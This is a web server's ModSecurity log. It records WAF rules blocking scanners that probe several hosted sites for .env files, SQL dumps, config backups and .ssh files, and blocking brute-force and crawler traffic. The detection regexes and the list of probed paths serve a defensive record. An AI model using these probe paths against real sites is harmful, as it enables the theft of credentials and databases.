[Tue May 26 19:57:34.298904 2026] [security2:error] [pid 93868:tid 94271] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/backup/site.bak"] [unique_id "ahWt1kqK9k_ZUB2Vp25l2wAAAZw"]
[Tue May 26 19:57:35.148083 2026] [security2:error] [pid 93868:tid 94375] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/config/private/settings.bak"] [unique_id "ahWt10qK9k_ZUB2Vp25l6QAAAgQ"]
[Tue May 26 19:57:35.656241 2026] [security2:error] [pid 93868:tid 94274] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/boot/.env"] [unique_id "ahWt10qK9k_ZUB2Vp25l8gAAAZ8"]
[Tue May 26 19:57:35.824989 2026] [security2:error] [pid 93868:tid 94323] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/service/.env.bak"] [unique_id "ahWt10qK9k_ZUB2Vp25l9gAAAdA"]
[Tue May 26 19:57:36.334475 2026] [security2:error] [pid 93868:tid 94299] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.env.bak"] [unique_id "ahWt2EqK9k_ZUB2Vp25l-wAAAbg"]
[Tue May 26 19:57:36.414739 2026] [security2:error] [pid 93576:tid 93750] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt12DRMqfxdEDkoszilgAAACY"]
[Tue May 26 19:57:36.852149 2026] [security2:error] [pid 93868:tid 94225] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/database.sql"] [unique_id "ahWt2EqK9k_ZUB2Vp25mCQABp2w"]
[Tue May 26 19:57:37.014113 2026] [security2:error] [pid 93868:tid 94272] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/test/config.bak"] [unique_id "ahWt2UqK9k_ZUB2Vp25mCwAAAZ0"]
[Tue May 26 19:57:37.351139 2026] [security2:error] [pid 93576:tid 93714] [client 46.8.157.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWt2WDRMqfxdEDkoszirwAAAAI"], referer: https://www.anujtradingco.com/
[Tue May 26 19:57:37.351240 2026] [security2:error] [pid 93868:tid 94283] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/booking-app/src/.env"] [unique_id "ahWt2UqK9k_ZUB2Vp25mEQAAAag"]
[Tue May 26 19:57:37.808275 2026] [security2:error] [pid 93868:tid 94227] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/dump.sql"] [unique_id "ahWt2UqK9k_ZUB2Vp25mIwABoW0"]
[Tue May 26 19:57:38.027262 2026] [security2:error] [pid 93868:tid 94377] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/craft/.env"] [unique_id "ahWt2kqK9k_ZUB2Vp25mJwAAAgY"]
[Tue May 26 19:57:38.482931 2026] [security2:error] [pid 93868:tid 94009] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/backup.sql"] [unique_id "ahWt2kqK9k_ZUB2Vp25mMwACCgk"]
[Tue May 26 19:57:38.504792 2026] [security2:error] [pid 93868:tid 94382] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt2kqK9k_ZUB2Vp25mKgAAAgs"]
[Tue May 26 19:57:38.705102 2026] [security2:error] [pid 93868:tid 94324] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/docker-compose.yml.bak"] [unique_id "ahWt2kqK9k_ZUB2Vp25mNgAAAdE"]
[Tue May 26 19:57:38.788606 2026] [security2:error] [pid 93868:tid 94246] [remote 45.148.10.5:27524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pkinsurance.co.in.svijaykumar.in"] [uri "/db.sql"] [unique_id "ahWt2kqK9k_ZUB2Vp25mPAACAnc"]
[Tue May 26 19:57:38.875216 2026] [security2:error] [pid 93868:tid 94378] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/strapi/.env"] [unique_id "ahWt2kqK9k_ZUB2Vp25mPwAAAgc"]
[Tue May 26 19:57:39.015923 2026] [security2:error] [pid 93868:tid 94284] [client 40.77.167.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahWt2kqK9k_ZUB2Vp25mMgABqWg"]
[Tue May 26 19:57:39.043970 2026] [security2:error] [pid 93868:tid 94300] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/tests/Integration/Environment/.env"] [unique_id "ahWt20qK9k_ZUB2Vp25mRQAAAbk"]
[Tue May 26 19:57:39.180081 2026] [security2:error] [pid 93576:tid 93731] [client 46.8.157.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWt22DRMqfxdEDkoszivQAAABM"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1225207&moderation-hash=786b3a7a8e7d5451d1268d58b9f0b4fc
[Tue May 26 19:57:39.272531 2026] [security2:error] [pid 93576:tid 93583] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/database.sql"] [unique_id "ahWt22DRMqfxdEDkoszivwAABQQ"]
[Tue May 26 19:57:39.384988 2026] [security2:error] [pid 93868:tid 94333] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/babel.config.js.bak"] [unique_id "ahWt20qK9k_ZUB2Vp25mSgAAAdo"]
[Tue May 26 19:57:39.553143 2026] [security2:error] [pid 93868:tid 94356] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/profile/.env"] [unique_id "ahWt20qK9k_ZUB2Vp25mTQAAAfE"]
[Tue May 26 19:57:39.720860 2026] [security2:error] [pid 93868:tid 94383] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/app/.env"] [unique_id "ahWt20qK9k_ZUB2Vp25mVQAAAgw"]
[Tue May 26 19:57:39.859792 2026] [security2:error] [pid 93576:tid 93582] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/dump.sql"] [unique_id "ahWt22DRMqfxdEDkoszixwAANAM"]
[Tue May 26 19:57:40.061658 2026] [security2:error] [pid 93868:tid 94365] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/backup_2.sql"] [unique_id "ahWt3EqK9k_ZUB2Vp25mWQAAAfo"]
[Tue May 26 19:57:40.571430 2026] [security2:error] [pid 93868:tid 94353] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/password.php.bak"] [unique_id "ahWt3EqK9k_ZUB2Vp25maQAAAe4"]
[Tue May 26 19:57:40.740444 2026] [security2:error] [pid 93868:tid 94280] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/uploads/dump.sql"] [unique_id "ahWt3EqK9k_ZUB2Vp25mcgAAAaU"]
[Tue May 26 19:57:40.859363 2026] [security2:error] [pid 93576:tid 93586] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/backup.sql"] [unique_id "ahWt3GDRMqfxdEDkoszi0AAAGgc"]
[Tue May 26 19:57:41.223688 2026] [security2:error] [pid 93576:tid 93587] [remote 45.148.10.5:43610] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "landsonlogistics.com"] [uri "/db.sql"] [unique_id "ahWt3WDRMqfxdEDkoszi2gAADwg"]
[Tue May 26 19:57:41.591130 2026] [security2:error] [pid 93868:tid 94345] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/db_backup.backup"] [unique_id "ahWt3UqK9k_ZUB2Vp25mhwAAAeY"]
[Tue May 26 19:57:41.642174 2026] [security2:error] [pid 93576:tid 93825] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt3WDRMqfxdEDkoszi2QAAAHE"]
[Tue May 26 19:57:42.439399 2026] [security2:error] [pid 93868:tid 94346] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/s3.php.bak"] [unique_id "ahWt3kqK9k_ZUB2Vp25mngAAAec"]
[Tue May 26 19:57:42.608681 2026] [security2:error] [pid 93868:tid 94350] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/api/config/env.sql"] [unique_id "ahWt3kqK9k_ZUB2Vp25mnwAAAes"]
[Tue May 26 19:57:42.777603 2026] [security2:error] [pid 93868:tid 94278] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.php.bak"] [unique_id "ahWt3kqK9k_ZUB2Vp25mpgAAAaM"]
[Tue May 26 19:57:42.834661 2026] [security2:error] [pid 93576:tid 93589] [remote 123.30.233.13:45718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWt3mDRMqfxdEDkoszi6AAAWQo"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:57:43.017948 2026] [security2:error] [pid 93868:tid 94341] [client 114.119.130.12:49447] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/kayseri-web-tasarim/"] [unique_id "ahWt30qK9k_ZUB2Vp25mqQAAAeI"], referer: http://energau.com/blog/item/7-anssi-certifica-y-da-una-clasificacion-al-?start=104660
[Tue May 26 19:57:43.229179 2026] [security2:error] [pid 93576:tid 93579] [remote 92.205.188.156:33506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWt32DRMqfxdEDkoszi7AAARAA"]
[Tue May 26 19:57:43.796723 2026] [security2:error] [pid 93868:tid 94320] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/.ssh/public.crt.bak"] [unique_id "ahWt30qK9k_ZUB2Vp25mvAAAAc0"]
[Tue May 26 19:57:44.134856 2026] [security2:error] [pid 93868:tid 94374] [client 185.177.72.53:3192] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/database.yml.copy"] [unique_id "ahWt4EqK9k_ZUB2Vp25myAAAAgM"]
[Tue May 26 19:57:44.368164 2026] [security2:error] [pid 93576:tid 93752] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt32DRMqfxdEDkoszi-QAAACg"]
[Tue May 26 19:57:44.977598 2026] [security2:error] [pid 93576:tid 93772] [client 185.177.72.53:38402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Passportjs/.env"] [unique_id "ahWt4GDRMqfxdEDkoszjCQAAADw"]
[Tue May 26 19:57:45.156913 2026] [security2:error] [pid 93576:tid 93821] [client 114.119.142.179:54461] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "toronto121mortgage.com"] [uri "/upload/files/72280-gde-mozhno-kupit-dlya-uvelicheniya-chlena.xml"] [unique_id "ahWt4WDRMqfxdEDkoszjDwAAAG0"], referer: http://www.samuitns.com/image/upload/35468-kupit-extra-extaz-sredstvo-dlya-uvelicheniya-chlena-v-ekibastuze.xml
[Tue May 26 19:57:45.898817 2026] [security2:error] [pid 93576:tid 93641] [remote 92.205.188.156:33506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWt4WDRMqfxdEDkoszjFwAAPj0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:57:46.311688 2026] [security2:error] [pid 93868:tid 94369] [client 46.8.157.174:59227] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWt4UqK9k_ZUB2Vp25m7wAAAf4"], referer: https://anujtradingco.com
[Tue May 26 19:57:46.367390 2026] [security2:error] [pid 93576:tid 93721] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWt4WDRMqfxdEDkoszjGQAAAAk"]
[Tue May 26 19:57:47.231957 2026] [core:alert] [pid 93868:tid 94333] [client 74.7.230.17:0] /home2/debatqhn/enattafoodparcel.org/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 19:57:47.232557 2026] [security2:error] [pid 93868:tid 94333] [client 74.7.230.17:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.enattafoodparcel.org.thedebateafrica.org"] [uri "/cgi-sys/500.html"] [unique_id "ahWt40qK9k_ZUB2Vp25nGQAAAdo"]
[Tue May 26 19:57:47.233304 2026] [security2:error] [pid 93868:tid 94327] [client 74.7.230.17:36034] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.enattafoodparcel.org.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWt40qK9k_ZUB2Vp25nFwAB1B4"]
